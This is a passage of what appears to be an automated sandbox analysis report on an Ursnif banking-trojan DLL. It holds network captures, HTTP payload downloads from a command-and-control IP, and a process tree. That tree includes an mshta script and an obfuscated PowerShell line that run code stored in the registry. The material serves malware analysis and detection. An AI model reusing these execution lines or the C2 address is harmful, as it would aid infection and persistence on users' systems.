                                    Apr 22, 2022 15:27:18.545809031 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:18.545855045 CEST4977580192.168.2.7146.70.35.138
                                    Apr 22, 2022 15:27:18.546144962 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:18.546216011 CEST4977580192.168.2.7146.70.35.138
                                    Apr 22, 2022 15:27:18.546246052 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:18.546284914 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:18.546309948 CEST4977580192.168.2.7146.70.35.138
                                    Apr 22, 2022 15:27:18.546390057 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:18.546443939 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:18.546451092 CEST4977580192.168.2.7146.70.35.138
                                    Apr 22, 2022 15:27:18.546478987 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:18.546499014 CEST4977580192.168.2.7146.70.35.138
                                    Apr 22, 2022 15:27:18.546525002 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:18.546571016 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:18.546603918 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:18.546608925 CEST4977580192.168.2.7146.70.35.138
                                    Apr 22, 2022 15:27:18.546619892 CEST4977580192.168.2.7146.70.35.138
                                    Apr 22, 2022 15:27:18.551635981 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:18.551785946 CEST4977580192.168.2.7146.70.35.138
                                    Apr 22, 2022 15:27:18.584644079 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:18.584686995 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:18.584705114 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:18.584732056 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:18.584752083 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:18.584791899 CEST4977580192.168.2.7146.70.35.138
                                    Apr 22, 2022 15:27:18.584825039 CEST4977580192.168.2.7146.70.35.138
                                    Apr 22, 2022 15:27:18.585397959 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:18.585433006 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:18.585467100 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:18.585475922 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:18.585484028 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:18.585501909 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:18.585505009 CEST4977580192.168.2.7146.70.35.138
                                    Apr 22, 2022 15:27:18.585522890 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:18.585545063 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:18.585568905 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:18.585577011 CEST4977580192.168.2.7146.70.35.138
                                    Apr 22, 2022 15:27:18.585623980 CEST4977580192.168.2.7146.70.35.138
                                    Apr 22, 2022 15:27:18.585632086 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:18.585697889 CEST4977580192.168.2.7146.70.35.138
                                    Apr 22, 2022 15:27:18.585833073 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:18.585899115 CEST4977580192.168.2.7146.70.35.138
                                    Apr 22, 2022 15:27:18.629539967 CEST4977580192.168.2.7146.70.35.138
                                    Apr 22, 2022 15:27:18.653682947 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:19.009407043 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:19.009474039 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:19.009495974 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:19.009526014 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:19.009552002 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:19.009571075 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:19.009596109 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:19.009603024 CEST4977580192.168.2.7146.70.35.138
                                    Apr 22, 2022 15:27:19.009619951 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:19.009640932 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:19.009650946 CEST4977580192.168.2.7146.70.35.138
                                    Apr 22, 2022 15:27:19.009659052 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:19.009743929 CEST4977580192.168.2.7146.70.35.138
                                    Apr 22, 2022 15:27:19.009845972 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:19.009874105 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:19.009891987 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:19.009917974 CEST4977580192.168.2.7146.70.35.138
                                    Apr 22, 2022 15:27:19.009924889 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:19.009931087 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:19.009968042 CEST4977580192.168.2.7146.70.35.138
                                    Apr 22, 2022 15:27:19.010001898 CEST4977580192.168.2.7146.70.35.138
                                    Apr 22, 2022 15:27:19.050602913 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:19.050656080 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:19.050677061 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:19.050703049 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:19.050705910 CEST4977580192.168.2.7146.70.35.138
                                    Apr 22, 2022 15:27:19.050729036 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:19.050734043 CEST4977580192.168.2.7146.70.35.138
                                    Apr 22, 2022 15:27:19.050746918 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:19.050755024 CEST4977580192.168.2.7146.70.35.138
                                    Apr 22, 2022 15:27:19.464545965 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:19.464555025 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:19.464689970 CEST4977580192.168.2.7146.70.35.138
                                    Apr 22, 2022 15:27:19.464783907 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:19.465156078 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:19.465188026 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:19.465213060 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:19.465231895 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:19.465264082 CEST4977580192.168.2.7146.70.35.138
                                    Apr 22, 2022 15:27:19.465272903 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:19.465302944 CEST4977580192.168.2.7146.70.35.138
                                    Apr 22, 2022 15:27:19.465325117 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:19.465332985 CEST4977580192.168.2.7146.70.35.138
                                    Apr 22, 2022 15:27:19.465348005 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:19.465363979 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:19.465385914 CEST4977580192.168.2.7146.70.35.138
                                    Apr 22, 2022 15:27:19.465415001 CEST4977580192.168.2.7146.70.35.138
                                    Apr 22, 2022 15:27:19.465428114 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:19.465502024 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:19.465527058 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:19.465543032 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:19.465562105 CEST4977580192.168.2.7146.70.35.138
                                    Apr 22, 2022 15:27:19.465567112 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:19.465590954 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:19.465611935 CEST4977580192.168.2.7146.70.35.138
                                    Apr 22, 2022 15:27:19.465614080 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:19.465631008 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:19.465639114 CEST4977580192.168.2.7146.70.35.138
                                    Apr 22, 2022 15:27:19.465683937 CEST4977580192.168.2.7146.70.35.138
                                    Apr 22, 2022 15:27:19.465698957 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:19.465780973 CEST4977580192.168.2.7146.70.35.138
                                    Apr 22, 2022 15:27:19.506732941 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:19.506783009 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:19.506808043 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:19.506824970 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:19.506849051 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:19.506870985 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:19.506870985 CEST4977580192.168.2.7146.70.35.138
                                    Apr 22, 2022 15:27:19.506894112 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:19.506911039 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:19.506922007 CEST4977580192.168.2.7146.70.35.138
                                    Apr 22, 2022 15:27:19.506933928 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:19.506956100 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:19.506958961 CEST4977580192.168.2.7146.70.35.138
                                    Apr 22, 2022 15:27:19.506979942 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:19.506988049 CEST4977580192.168.2.7146.70.35.138
                                    Apr 22, 2022 15:27:19.506995916 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:19.507019043 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:19.507040977 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:19.507046938 CEST4977580192.168.2.7146.70.35.138
                                    Apr 22, 2022 15:27:19.507064104 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:19.507080078 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:19.507090092 CEST4977580192.168.2.7146.70.35.138
                                    Apr 22, 2022 15:27:19.507100105 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:19.507119894 CEST4977580192.168.2.7146.70.35.138
                                    Apr 22, 2022 15:27:19.507405996 CEST4977580192.168.2.7146.70.35.138
                                    Apr 22, 2022 15:27:19.716505051 CEST4977580192.168.2.7146.70.35.138
                                    Apr 22, 2022 15:27:19.741142035 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:20.120021105 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:20.120052099 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:20.120165110 CEST4977580192.168.2.7146.70.35.138
                                    Apr 22, 2022 15:28:21.255120993 CEST4977580192.168.2.7146.70.35.138
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
Apr 22, 2022 15:26:57.316037893 CEST | 8.8.8.8 | 192.168.2.7 | 0x9880 | No error (0) | l-0007.l-dc-msedge.net | | 13.107.43.16 | A (IP address) | IN (0x0001)
Apr 22, 2022 15:26:57.330679893 CEST | 8.8.8.8 | 192.168.2.7 | 0x6bd2 | No error (0) | a-0019.a-msedge.net | a-0019.a.dns.azurefd.net | | CNAME (Canonical name) | IN (0x0001)
Apr 22, 2022 15:26:57.330679893 CEST | 8.8.8.8 | 192.168.2.7 | 0x6bd2 | No error (0) | a-0019.a.dns.azurefd.net | a-0019.standard.a-msedge.net | | CNAME (Canonical name) | IN (0x0001)
Apr 22, 2022 15:26:57.330679893 CEST | 8.8.8.8 | 192.168.2.7 | 0x6bd2 | No error (0) | a-0019.standard.a-msedge.net | | 204.79.197.222 | A (IP address) | IN (0x0001)
                                    • 146.70.35.138
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.7 | 49775 | 146.70.35.138 | 80 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | kBytes transferred | Direction | Data
Apr 22, 2022 15:27:17.806870937 CEST | 1052 | OUT | GET /phpadmin/amEwUCMy/zQvTSnELMCHIJfWA9A7NF2J/B_2FgTN3w5/bDUz7M_2FQ_2FvsyQ/_2FoZnlV0ztm/G4pVInXE2v2/3DjsF_2BN_2F7_/2FqxWA7q0ZWwUgJ9q_2B6/oG7o48SwKb_2FuN4/koQCfS1rrGeWSn9/gvwn1WY7oRq54G3QzL/QoP8Nx_2F/m8EC_2FPKp_2B2QIRT4a/hKoi_2FT5FiIh7mNlS7/jciRuxpI3KdaM19hmR8F9V/NOK7C_2BauAdB/emv_2BixRfY4926/zZ.src HTTP/1.1
                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                                    Host: 146.70.35.138
                                    Connection: Keep-Alive
                                    Cache-Control: no-cache
Apr 22, 2022 15:27:18.182925940 CEST | 1053 | IN | HTTP/1.1 200 OK
                                    Server: nginx/1.18.0 (Ubuntu)
                                    Date: Fri, 22 Apr 2022 13:27:18 GMT
                                    Content-Type: application/octet-stream
                                    Content-Length: 185492
                                    Connection: keep-alive
                                    Pragma: public
                                    Accept-Ranges: bytes
                                    Expires: 0
                                    Cache-Control: must-revalidate, post-check=0, pre-check=0
                                    Content-Disposition: inline; filename="6262ad36246e4.bin"
Apr 22, 2022 15:27:18.629539967 CEST | 1252 | OUT | GET /phpadmin/1p0semBcWFOiJ/VuHxHtu5/AN830nRWQ1d2xctaoA3KLHR/918Z9VEhPV/P8ohXldFwnNmepL6Q/uKTfc4fmSrkK/BfYNKcK_2Bx/w_2FA1ltM5KCgm/3UT06OWaufeDOP8Oq_2FL/oIF6meLVrySmPHH0/RIFJ_2FHuhWguIS/4hvBrDpXZ_2FB9M_2F/VjlCK_2FC/TflkNLJtzRIEzaze5_2F/wDsLbDghNL5li48V5rm/4qe0lRbO5_2FdP6RKk3aIg/j40b09twfw_2F/PdHkwNcC/i0_2BVuZ/L.src HTTP/1.1
                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                                    Host: 146.70.35.138
                                    Connection: Keep-Alive
                                    Cache-Control: no-cache
Apr 22, 2022 15:27:19.009407043 CEST | 1254 | IN | HTTP/1.1 200 OK
                                    Server: nginx/1.18.0 (Ubuntu)
                                    Date: Fri, 22 Apr 2022 13:27:18 GMT
                                    Content-Type: application/octet-stream
                                    Content-Length: 237210
                                    Connection: keep-alive
                                    Pragma: public
                                    Accept-Ranges: bytes
                                    Expires: 0
                                    Cache-Control: must-revalidate, post-check=0, pre-check=0
                                    Content-Disposition: inline; filename="6262ad36edbb0.bin"
Apr 22, 2022 15:27:19.716505051 CEST | 1509 | OUT | GET /phpadmin/sJOLDU_2FhOUoo/k46SW66GV6I1pQKjWA9TE/PWpby4hvIkOnAKsS/x0Aee5T7Xyol_2F/mHBJFq72pa7ZryIdq5/j7jpLfh_2/B9C_2B8rr1N7pwYs7Hbz/HAjnG5DvkxUUwsnvZ2H/7mKa3lBAhH1k0Vg5CBUe72/SPp1Kc_2FZv6K/7UGQxmIh/q1dxSy205p9HqV1EWhDaIi0/wpq760vWJe/2wvTRaTBNSXKAlgWL/PHcpI3wJ6a_2/BROCpFJpoTX/N2ZuQyATVgKAeO/_2Fd3SdF.src HTTP/1.1
                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                                    Host: 146.70.35.138
                                    Connection: Keep-Alive
                                    Cache-Control: no-cache
Apr 22, 2022 15:27:20.120021105 CEST | 1510 | IN | HTTP/1.1 200 OK
                                    Server: nginx/1.18.0 (Ubuntu)
                                    Date: Fri, 22 Apr 2022 13:27:20 GMT
                                    Content-Type: application/octet-stream
                                    Content-Length: 1869
                                    Connection: keep-alive
                                    Pragma: public
                                    Accept-Ranges: bytes
                                    Expires: 0
                                    Cache-Control: must-revalidate, post-check=0, pre-check=0
                                    Content-Disposition: inline; filename="6262ad3811867.bin"


Target ID: 0
Start time: 15:26:39
Start date: 22/04/2022
Path: C:\Windows\System32\loaddll32.exe
Wow64 process (32bit): true
Commandline: loaddll32.exe "C:\Users\user\Desktop\HxEWwh74qT.dll"
Imagebase: 0x950000
File size: 116736 bytes
MD5 hash: 7DEB5DB86C0AC789123DEC286286B938
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

Target ID: 2
Start time: 15:26:40
Start date: 22/04/2022
Path: C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit): true
Commandline: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\HxEWwh74qT.dll",#1
Imagebase: 0xdd0000
File size: 232960 bytes
MD5 hash: F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

Target ID: 3
Start time: 15:26:40
Start date: 22/04/2022
Path: C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit): true
Commandline: rundll32.exe "C:\Users\user\Desktop\HxEWwh74qT.dll",#1
Imagebase: 0xd20000
File size: 61952 bytes
MD5 hash: D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
                                    • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.391081269.00000000054A8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.439315042.00000000052AC000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000003.00000003.438131198.00000000053AA000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.491963654.0000000006098000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.436001223.00000000054A8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.438329210.00000000054A8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000003.00000003.438206007.0000000005429000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.391236122.00000000054A8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.390852806.00000000054A8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.390783473.00000000054A8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000003.00000003.566002484.0000000004C79000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.390963737.00000000054A8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000003.00000002.568306199.0000000002E80000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.391015018.00000000054A8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000003.00000002.569427566.000000000512F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.390663420.00000000054A8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.391212771.00000000054A8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                    Reputation:high

                                    Target ID:6
                                    Start time:15:26:43
                                    Start date:22/04/2022
                                    Path:C:\Windows\SysWOW64\WerFault.exe
                                    Wow64 process (32bit):true
                                    Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 7080 -s 608
                                    Imagebase:0xb30000
                                    File size:434592 bytes
                                    MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high

                                    Target ID:8
                                    Start time:15:26:48
                                    Start date:22/04/2022
                                    Path:C:\Windows\SysWOW64\WerFault.exe
                                    Wow64 process (32bit):true
                                    Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 7080 -s 604
                                    Imagebase:0x7ff7e8070000
                                    File size:434592 bytes
                                    MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high

                                    Target ID:12
                                    Start time:15:26:58
                                    Start date:22/04/2022
                                    Path:C:\Windows\SysWOW64\WerFault.exe
                                    Wow64 process (32bit):true
                                    Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 7080 -s 612
                                    Imagebase:0xb30000
                                    File size:434592 bytes
                                    MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high

                                    Target ID:19
                                    Start time:15:27:24
                                    Start date:22/04/2022
                                    Path:C:\Windows\System32\mshta.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\System32\mshta.exe" "about:<hta:application><script>Lpje='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Lpje).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script>
                                    Imagebase:0x7ff7dccb0000
                                    File size:14848 bytes
                                    MD5 hash:197FC97C6A843BEBB445C1D9C58DCBDB
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high

                                    Target ID:20
                                    Start time:15:27:26
                                    Start date:22/04/2022
                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    Wow64 process (32bit):false
                                    Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name wufxrouxe -value gp; new-alias -name atvqcmfj -value iex; atvqcmfj ([System.Text.Encoding]::ASCII.GetString((wufxrouxe "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn))
                                    Imagebase:0x7ff612400000
                                    File size:447488 bytes
                                    MD5 hash:95000560239032BC68B4C2FDFCDEF913
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:.Net C# or VB.NET
                                    Yara matches:
                                    • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000014.00000002.766882377.000002DC00CFC000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000014.00000002.766683570.000002DC007F0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000014.00000003.513984044.000002DC00CFC000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                    Reputation:high

                                    Target ID:21
                                    Start time:15:27:26
                                    Start date:22/04/2022
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff7bab80000
                                    File size:625664 bytes
                                    MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language

                                    Target ID:24
                                    Start time:15:27:37
                                    Start date:22/04/2022
                                    Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\pkbugtxo\pkbugtxo.cmdline
                                    Imagebase:0x7ff748600000
                                    File size:2739304 bytes
                                    MD5 hash:B46100977911A0C9FB1C3E5F16A5017D
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:.Net C# or VB.NET

                                    Target ID:25
                                    Start time:15:27:39
                                    Start date:22/04/2022
                                    Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RESD841.tmp" "c:\Users\user\AppData\Local\Temp\pkbugtxo\CSC26C720E9EBC041F086604EECC7DD3CDD.TMP"
                                    Imagebase:0x7ff756520000
                                    File size:47280 bytes
                                    MD5 hash:33BB8BE0B4F547324D93D5D2725CAC3D
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language

                                    Target ID:27
                                    Start time:15:27:43
                                    Start date:22/04/2022
                                    Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\lboh4mlq\lboh4mlq.cmdline
                                    Imagebase:0x7ff748600000
                                    File size:2739304 bytes
                                    MD5 hash:B46100977911A0C9FB1C3E5F16A5017D
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:.Net C# or VB.NET

                                    Target ID:28
                                    Start time:15:27:44
                                    Start date:22/04/2022
                                    Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RESED31.tmp" "c:\Users\user\AppData\Local\Temp\lboh4mlq\CSC3DF21D054A9F4C66BF1FA9CD771B1F79.TMP"
                                    Imagebase:0x7ff756520000
                                    File size:47280 bytes
                                    MD5 hash:33BB8BE0B4F547324D93D5D2725CAC3D
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language

                                    Target ID:29
                                    Start time:15:27:45
                                    Start date:22/04/2022
                                    Path:C:\Windows\System32\control.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\control.exe -h
                                    Imagebase:0x7ff6b9f10000
                                    File size:117760 bytes
                                    MD5 hash:625DAC87CB5D7D44C5CA1DA57898065F
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 0000001D.00000003.518242223.000001BF7E55C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 0000001D.00000003.518050705.000001BF7E55C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 0000001D.00000000.517494573.0000000000500000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 0000001D.00000000.515954749.0000000000500000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 0000001D.00000000.516723035.0000000000500000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security

                                    Target ID:33
                                    Start time:15:27:58
                                    Start date:22/04/2022
                                    Path:C:\Windows\explorer.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\Explorer.EXE
                                    Imagebase:0x7ff631f70000
                                    File size:3933184 bytes
                                    MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language

                                    Target ID:37
